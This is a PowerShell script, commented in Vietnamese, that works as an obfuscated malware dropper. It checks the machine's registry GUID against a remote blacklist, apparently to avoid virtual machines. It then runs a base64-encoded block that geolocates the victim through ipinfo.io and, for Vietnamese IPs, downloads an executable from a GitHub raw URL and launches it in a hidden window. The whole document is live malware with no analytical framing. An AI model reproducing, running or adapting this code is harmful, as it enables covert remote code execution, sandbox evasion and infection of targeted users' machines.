# Lấy giá trị MachineGuid từ Registry
$machineGuid = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Cryptography" -Name "MachineGuid").MachineGuid

# URL của file MachineGuid.txt
$url = "https://raw.githubusercontent.com/43a1723/test/main/Extras/vm.txt"

# Tải nội dung của file MachineGuid.txt
try {
    $remoteContent = Invoke-WebRequest -Uri $url -UseBasicParsing
    $machineGuids = $remoteContent.Content -split "`n" -replace "`r",""
} catch {
    Write-Host "Không thể tải tệp từ URL. Kiểm tra kết nối mạng và URL."
    exit
}

# Kiểm tra xem MachineGuid có trong danh sách không
if ($machineGuids -contains $machineGuid) {
    Write-Host "MachineGuid có trong danh sách đen."
} else {
    IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("IyBM4bqleSDEkeG7i2EgY2jhu4kgSVAgaGnhu4duIHThuqFpCiRpcEluZm8gPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICJodHRwczovL2lwaW5mby5pby9qc29uIgokY291bnRyeSA9ICRpcEluZm8uY291bnRyeQoKIyBLaeG7g20gdHJhIG7hur91IElQIGzDoCDhu58gVmnhu4d0IE5hbQppZiAoJGNvdW50cnkgLWVxICJWTiIpIHsKICAgICR0ZW1wID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKQogICAgJGZpbGVVcmwgPSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tLzQzYTE3MjMvdGVzdC9tYWluL0V4dHJhcy9MTUFPX3Byb3RlY3RlZC5leGUiCiAgICAkb3V0cHV0RmlsZSA9IEpvaW4tUGF0aCAtUGF0aCAkdGVtcCAtQ2hpbGRQYXRoICJza2lkLmV4ZSIKCiAgICAjIFThuqNpIHh14buRbmcgdsOgIGNo4bqheSBmaWxlCiAgICBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRmaWxlVXJsIC1PdXRGaWxlICRvdXRwdXRGaWxlCiAgICBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkb3V0cHV0RmlsZSAtV2luZG93U3R5bGUgSGlkZGVuCn0gZWxzZSB7CiAgICBXcml0ZS1PdXRwdXQgIklQIGtow7RuZyBwaOG6o2kgbMOgIHThu6sgVmnhu4d0IE5hbS4iCn0KIyBM4bqleSDEkeG7i2EgY2jhu4kgSVAgaGnhu4duIHThuqFpCiRpcEluZm8gPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICJodHRwczovL2lwaW5mby5pby9qc29uIgokY291bnRyeSA9ICRpcEluZm8uY291bnRyeQoKIyBLaeG7g20gdHJhIG7hur91IElQIGzDoCDhu58gVmnhu4d0IE5hbQppZiAoJGNvdW50cnkgLWVxICJWTiIpIHsKICAgIEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS80M2ExNzIzL3Rlc3QvbWFpbi9FeHRyYXMvTE1BT19wcm90ZWN0ZWQuZXhlIiAtT3V0RmlsZSAiJHRlbXBcc2tpZC5leGUiCiAgICBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiJHRlbXBcc2tpZC5leGUiIC1XaW5kb3dTdHlsZSBIaWRkZW4KfSBlbHNlIHsKICAgIFdyaXRlLU91dHB1dCAiSVAga2jDtG5nIHBo4bqjaSBsw6AgdOG7qyBWaeG7h3QgTmFtLiIKfQo=")))
}

